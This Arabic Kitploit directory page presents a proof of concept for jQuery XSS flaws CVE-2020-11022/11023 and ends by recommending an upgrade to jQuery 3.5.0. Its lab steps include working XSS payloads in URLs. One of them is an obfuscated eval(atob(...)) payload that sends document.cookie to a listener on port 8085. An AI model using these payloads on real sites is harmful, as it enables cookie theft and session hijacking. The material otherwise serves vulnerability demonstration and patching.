Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-11022-CVE-2020-11023 — شيء صغير تم تجميعه بسرعة لتوضيح ثغرة CVE هذه | Kitploit
أدوات/GitHubGitHub/0xaj2k/cve-2020-11022-cve-2020-11023
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليم
GitHub0xaj2k/cve-2020-11022-cve-2020-11023

CVE-2020-11022-CVE-2020-11023

شيء صغير تم تجميعه بسرعة لتوضيح ثغرة CVE هذه

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
354منذ 3 سنواتتمت المراجعة من قبل Kitploit

CVE-2020-11022 CVE-2020-11023

في إصدارات jQuery الأكبر من أو تساوي 1.2 والأصغر من 3.5.0، قد يؤدي تمرير HTML من مصادر غير موثوقة - حتى بعد تنظيفه - إلى إحدى طرق معالجة DOM الخاصة بـ jQuery (مثل .html() و .append() وغيرها) إلى تنفيذ كود غير موثوق. تم إصلاح هذه المشكلة في jQuery 3.5.0.

في إصدارات jQuery الأكبر من أو تساوي 1.0.3 والأصغر من 3.5.0، قد يؤدي تمرير HTML يحتوي على عناصر من مصادر غير موثوقة - حتى بعد تنظيفه - إلى إحدى طرق معالجة DOM الخاصة بـ jQuery (مثل .html() و .append() وغيرها) إلى تنفيذ كود غير موثوق. تم إصلاح هذه المشكلة في jQuery 3.5.0.

الاستغلال

  1. استضف صفحة index.php على خادم PHP. أقترح استخدام sudo php -S 127.0.0.1:80 لتشغيل خادم سريع.

XSS بسيط

  1. قم بزيارة المسار http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=alert(1)%3E
  2. اضغط على زر "Append via .html()".
  3. شاهد نافذة التنبيه المنبثقة.

صورة

سرقة الكوكيز

  1. ابدأ خادم ويب آخر على المنفذ 8085، أقترح استخدام Python لهذا: sudo python3 -m http.server 8085
  2. قم بزيارة المسار http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=eval(atob(%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly8xMjcuMC4wLjE6ODA4NS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==%27))%3E
  3. اضغط على زر "Append via .html()".
  4. تحقق من سجلات Python وسترى ملف تعريف الارتباط الخاص بك في السجل.

صورة

الإصلاح

إذا كنت ترغب في إصلاح هذا الثغرة (CVE) في هذا السكريبت، فما عليك سوى تغيير إصدار jQuery إلى https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.js :)

تنزيل الأداة